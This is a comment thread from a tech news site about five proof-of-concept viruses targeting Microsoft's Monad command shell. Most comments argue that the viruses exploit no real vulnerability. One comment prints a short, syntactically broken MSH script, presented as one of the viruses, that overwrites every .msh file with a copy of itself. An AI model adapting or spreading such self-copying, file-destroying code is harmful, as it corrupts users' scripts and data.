Windows Vista Tool Targeted By Virus Writers

An anonymous reader writes "Five proof-of-concept viruses that target Monad, the next version of Vista's command prompt, have been published on the web. Monad is a command line interface and scripting language that is similar to Unix shells such as bash, but is based on object-oriented programming and the .Net framework. The viruses' only action is to infect other shell scripts on the host's operating system. They would cause little harm in the wild, but would be relatively easy to modify using the information from the article, said Mikko Hyppönen, the director of antivirus research at F-Secure."

Short on Details

There are always virus writers who want to be the first to write a virus for a new platform.

I don't see what a big deal being the first person to write a virus for Vista is. Oh, first post!

But seriously, this article is very light on the details. I assume that these virus writers found a way to gain administrative rights using Monad, but the article makes it sound like these are just malicious scripts. It might as well be a advanced batch script that can spread it self then del /s /q.

Re:Short on Details

[Leeji]

You got it right when you said "it might as well be a batch script." These are just Monad scripts running on the system, just like batch files, perl scripts, Cygwin bash scripts, Ruby scripts, etc.

There is nothing intrinsic in Monad that enables these attacks, aside from it being a new language. In fact, Monad implements several features that help mitigate the dangers of traditional script viruses, as I outline here.

Re:Short on Details

[Owndapan]

I believe Monad/MSH is no longer even a part of the Longhorn release, so it is a bit unfair have everyone jump on it as a Windows Vista exploit. From Wikipedia:

MSH was originally slated to be shipped with Windows Vista, but has since assumed its own release schedule. Microsoft sources have confirmed MSH's first public release will most likely precede the release of Vista and be part of the next edition of Microsoft Exchange, due in the second half of 2006.

Re:Short on Details

[Coryoth]

You got it right when you said "it might as well be a batch script." These are just Monad scripts running on the system, just like batch files, perl scripts, Cygwin bash scripts, Ruby scripts, etc.

Yes but you must remember that F-Secure are a bunch of alarmist gits who will jump at any opportunity to seed panic with regard to threats of viruses, hackers, "cyberterrorists" (if such a thing even exists), and whatever else they can dream up. Read through a decent sampling of their past press releases and you'll get the idea.

Certainly there are potential issues, but I don't think there's really anything to panic about yet.

Jedidiah.

Re:Short on Details

[Negatif]

Nope, FRISK Software makes F-Prot. Not sure if you're trolling or just being misinformed.

What? Say it isn't so!

[CypherXero]

Microsoft Windows is insecure! More details later, movie at 10.

Re:What? Say it isn't so!

[patio11]

This just in! Running arbitrary code from an untrusted source not a security best-practice!

Comments from a Monad developer

[Leeji]

The fact that MSH is used as the execution vehicle is really a side-note, as it does not exploit any vulnerabilities in Monad. The guidance on shell script viruses is the same as the guidance on all viruses and malware: protect yourself against the point of entry, and limit the amount of damage that the malicious code can do.

That's not to belittle the dangers of script viruses, though.

I wrote a blog entry about it here, in relation to Monad.

Re:Comments from a Monad developer

[stratjakt]

They've stated that they dont care if legacy apps break, and they proved it (somewhat) with XP SP2, and an anti-spyware tool which kicks the crap out of a lot of old code.

I'm sure I'm not the only developer out there who's had to rewrite some stuff to keep XP happy. And, despite the extra work, I see it as a good thing.

Re:Comments from a Monad developer

[jest3r]

Believe it or not but "Monad" wasn't their first choice. Other names which were seriously considered include: Mesticle, Menis, Magina and Mitoris ...

Re:Comments from a Monad developer

[Osty]

The real question is why the heck they decided to call it "Monad"?!

The short answer: It's a codename. It won't ship with that name. Most likely it'll go with the less interesting "Microsoft Shell" or "msh".

The long answer: Monad and Monads in functional programming (long answer has been diverted to Wikipedia, because I'm lazy).

The non-answer: Get your mind of the gutter, you pervert. Not everything ending in "-nad" refers to genitalia.

Re:Comments from a Monad developer

[starling]

Yabbut if they'd chosen one of those other names the GNU version wouldn't end up being called Gonad.

Sneaky, huh?

Re:Comments from a Monad developer

[kfg]

Missing option:

Moobs.

KFG

Re:Comments from a Monad developer

[shmlco]

I don't see why they can't lock it down firewall-style. When XYZ application runs and tries to hit a reserved directory or section of the registry, popup a window saying so and ask if you want to allow it.

You might not even need the popup. My firewall on a couple of machines has a database it can go out to search and see if this application is "known" and should have access.

It might be less secure than a total limited-account-lockdown, but it would be better than nothing. In fact, I think the latest version of ZoneAlarm already has this sort of "inner firewall".

Re:Comments from a Monad developer

[Oscar_Wilde]

The guidance on shell script viruses is the same as the guidance on all viruses and malware: protect yourself against the point of entry, and limit the amount of damage that the malicious code can do.
 
For those of you who still don't get it: stop logging in as an administrator you idiots.

Re:Comments from a Monad developer

[NickFortune]

Yabbut if they'd chosen one of those other names the GNU version wouldn't end up being called Gonad.

Looking at the syntax, I think the GPL version is called Perl 6

Re:Comments from a Monad developer

becuase people are retards and would click "no don't allow access" then proceed to whinge to tech support that their internet is broken, nothing works, blah blah...

OTOH, people are retards and would click "yes do allow access" then proceed to whinge to tech support that their computer is broken, nothing works, blah blah

Re:What's the motivation

So l337 h4x0rz c4n pwn j00!!!!

Nothing serious i must say

Something which requires you to execute a script on the computer is not a virus. Think if you execute a bash script in Linux and it goes on and put itself in all your bash scripts, would you call it a virus?

This is actually nothing, it simply prepends/appends or put itself in the middle of existing MSH scripts. It is equivalent to, if you run a binary on your machine, it can attach itself to all the binaries on your machine.

On top of that, MSH by default on let digitally signed scripts to execute hence once infected scripts on execute. This is not really a threat at all.

How is this different from *NIX shell scripts?

[MagikSlinger]

How is this different than writing a ksh or bash script virus? Ksh and bash script viruses can be just as bad. Heck, remember the Morris worm?

I like bashing M$ just as much as the next ./er, but this might not be their bad just yet.

Re:Oopsie!

[jmking1]

That's exactly the reasoning people used in support of Firefox before 1.0 was released. I don't see why it can't be used for any beta software.

Oh, and just for completeness, vulnerabilities have been found in Firefox since 1.0, so the argument that only Microsoft releases "beta" (read: vulnerable/insecure) code as production-level software doesn't work either.

So what?

[IchBinEinPenguin]

All this proves is that Monad can find and modify text files (and that there are idiots out there who will misuse tools).
About the only way around this is code-signing to prevent modification (yeah, like I'm gonna sign every single perl script I ever wrote.....)

It's not like you can't do this in bash, awk, sed, perl, python, REXX etc. etc.

full circle wtf ?

[bxbaser]

I must be getting old when i see the full circles everywhere.

when windows 95 came out the windows zealots where so quick to point out "no more haveing to type in dos windows is better than everything" now they will say "we have a shell windows is better than everything"

Re:Not a vulnerability

[dedazo]

Slashdot has a history of reporting user-executed attachments as "vulnerabilities", to the never ending delight of the peanut gallery, who consider that it's Microsoft's fault if I run something I shouldn't have on my computer, but if I do the same thing on any other OS, it's my fault.

Plus, Hakko Mipponen (or whatever his name is) has to make a living scaring the bejezus out of everyone - what better way to get started than with something that's not even really out of alpha?

Leibnitz is rolling is his grave

[calculadoru]

Quoth the wise man in his treatise Monadology (1714):
"There is also no way of explaining how a monad can be altered or changed in its inner being by any other created thing, since there is no possibility of transposition within it, nor can we conceive of any internal movement which can be produced, directed, increased or diminished within it, such as can take place in the case of compounds where a change can occur among the parts. The monads have no windows through which anything may come in or go out. The Attributes cannot detach themselves or go forth from the substances, as could sensible species of the Schoolmen. In the same way neither substance nor attribute can enter from without into a monad."

And they they've managed to attack them??? Oh, the humanity...

More Windows viruses?

[Lisandro]

Awwww, crap guys. Let it go already. It's a bit like kicking a crippled at this point.

Re:What's the motivation

[dedazo]

Maybe it's because they pound their chests and declare they're the most secure, cheapest, bestest, fastest, etc, etc, even when there's overwhelming evidence to the contrary.

Yeah, it sucks when that happens.

Of course you can always "embargo" all your vulnerability details (see for example bug #294795) - and feel comfortable in your superior position!

An Example of One of the So-Called Viruses

[AdamBa]

This is the verbatim text of one of the five viruses:

$name_array=get-childitem *.msh
foreach ($name in $name_array)
{
if ($name.Length -eq 249)
$my_file=$name.Name
}
}

foreach ($victim in $name_array)
{
if ($name.Length -ne 249)
{
copy-item $my_file $name.Name
}
}

All it does is find every .msh file and replace its contents with itself. That's it. You could do it with a .CMD file in any version of Windows (and of course in any other scripting language).

The other scripts get a bit more complicated (insert at a random spot in the file, etc) but that's basically it. There's no new vulnerability exposed by Monad.

- adam

The Monad

[payndz]

In the comic series The ABC Warriors (specifically the story 'Black Hole'), the Monad was a bloated, ruthless manifestation of all human evil that attempted to destroy the Earth by corrupting and overloading the incredible technological achievement that linked humanity together.

But I'm sure that's just a coincidence.

i dont see why this is news....

[Madd+Scientist]

1) it's a scripting language
2) assume you already have command line access

a "virus" at this point is trivial... just append the code to append itself at the end of every file it assumes is a script for this command line.

this is like batch file viruses that format the drive... it isn't anything special, it's just a matter of getting the mark to run the file. nothing to see here.

Too many Moving Parts

[ajs318]

Why the hell does a command line interface need to incorporate Object Oriented features? This sounds to me like adding features for features' sake.

The more sophisticated you make a system, the more failure modes you introduce -- and the harder it gets to test the edge cases, because there end up being too many edges. You want Obejct Oriented? I'll give you an Object Oriented example. Let's have a "length" type with properties which correspond to its conversion into different measuring units.

var height IsOfType length
reset height
let height = 1.75
print height.feet # prints 5
print height.feet.inches # prints 8.8975
print height.inches # prints 68.8975
reset height
let height.inches = 72
print height.feet # prints 6
print height # prints 1.8288
forget height

It may well be pretty, but outside of any programme dealing with units conversion it's fairly unnecessary. And it contains many programming hazards which would thwart the careless implementor. {BTW, that was a fictitious example; but I'm willing to bet there is at least one programming language out there that actually implements something like it.}

All a command shell really has to do is be able to launch programmes, police the I/O traffic and keep hold of some state information. If it can do all that right, any other functionality you need can be provided by external programmes. That way, everything is kept as simple as it needs to be; you haven't got code cluttering up things that don't need it. If you do build functionality into the shell, there should be a bloody good reason -- usually that reason is that some external programme is getting launched more than its fair share. And in that case you already have the code you need to incorporate and it's been thoroughly tested.